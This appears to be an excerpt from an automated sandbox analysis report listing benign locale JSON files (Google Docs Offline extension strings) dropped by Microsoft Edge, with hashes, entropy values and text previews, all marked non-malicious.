                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
